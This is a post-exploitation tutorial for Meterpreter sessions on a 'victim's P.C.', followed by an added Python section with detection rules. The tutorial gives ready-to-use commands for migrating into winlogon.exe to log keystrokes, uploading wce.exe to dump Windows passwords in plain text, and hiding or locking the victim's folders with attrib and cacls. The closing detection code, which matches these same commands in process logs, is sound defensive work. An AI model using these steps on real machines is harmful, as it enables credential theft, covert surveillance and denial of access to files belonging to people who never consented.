(A) Hide File in victim's P.C.:-
After successfully getting a meterpreter session you can hide any file or folder on the victim's P.C. with the attrib command (+h hidden, +r read-only, +s system). The general form is:
attrib +h +r +s drivename:\Foldername
For example, to hide a folder named “songs” on the F drive, type the following commands in your terminal.
shell
attrib +h +r +s F:\songs
To unhide the folder:
attrib -h -r -s F:\songs
(B) Get passwords of remote Windows P.C.:-
After getting a meterpreter session, type the ps command; it displays the list of running processes. Next, migrate the meterpreter session into one of the running processes by giving its process ID.
In this example we will migrate the meterpreter session to winlogon.exe, whose process ID is 600.
Type the following command in your terminal.
migrate 600
keyscan_start – to start the keylogger
keyscan_dump – to print captured keystrokes
keyscan_stop – to stop the keylogger
(C) Remote Windows password in plain text:-
Type the following commands in your meterpreter session.
upload /pentest/passwords/wce/wce.exe
shell
wce.exe -w
(D) Lock Folder in Remote P.C.:-
After getting a meterpreter session, type the following command.
Cacls (Folder Name) /e /p everyone:n
This will lock the folder.
To unlock:
Cacls (Folder Name) /e /p everyone:f
Here are more methods of post exploitation.
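A defender's view of sections (A), (C) and (D), as an added example that is not part of the original post: each of those commands starts a process with a distinctive command line, so it can be matched in process-creation logs. The event records, host names and rule names below are constructed for illustration.

```python
import re

def attrib_hidden_system(cmd):
    """attrib that sets both Hidden (+h) and System (+s), as in section (A)."""
    is_attrib = re.search(r'\battrib(\.exe)?"?\s', cmd)
    return bool(is_attrib) and {"+h", "+s"} <= set(cmd.split())

def cacls_deny_everyone(cmd):
    """cacls that replaces Everyone's access with none (/p everyone:n), section (D)."""
    is_cacls = re.search(r'\bcacls(\.exe)?"?\s', cmd)
    return bool(is_cacls and re.search(r'/p\s+everyone:n\b', cmd))

def wce_cleartext(cmd):
    """wce.exe started with -w, the invocation shown in section (C)."""
    is_wce = re.search(r'\bwce(\.exe)?"?(\s|$)', cmd)
    return bool(is_wce) and "-w" in cmd.split()

RULES = {
    "attrib_hidden_system": attrib_hidden_system,
    "cacls_deny_everyone": cacls_deny_everyone,
    "wce_cleartext_dump": wce_cleartext,
}

# Constructed process-creation records (not real logs).
SAMPLE_EVENTS = [
    {"host": "WS01", "cmd": r"attrib +h +r +s F:\songs"},
    {"host": "WS01", "cmd": r"attrib -h -r -s F:\songs"},
    {"host": "WS01", "cmd": r'C:\Windows\System32\cacls.exe "F:\songs" /e /p everyone:n'},
    {"host": "WS01", "cmd": r"cacls F:\songs /e /p everyone:f"},
    {"host": "WS02", "cmd": r"wce.exe -w"},
    {"host": "WS02", "cmd": r"attrib +r C:\reports\q1.xlsx"},
]

def detect(events):
    """Return (host, rule name, original command line) for every rule hit."""
    hits = []
    for ev in events:
        cmd = ev["cmd"].lower()  # Windows command names and switches are case-insensitive
        for name, rule in RULES.items():
            if rule(cmd):
                hits.append((ev["host"], name, ev["cmd"]))
    return hits

if __name__ == "__main__":
    for host, rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{host}  {rule:22}  {cmd}")
```

The migrate and keyscan steps in (B) run inside the existing session and start no new process, so command-line rules like these do not see them.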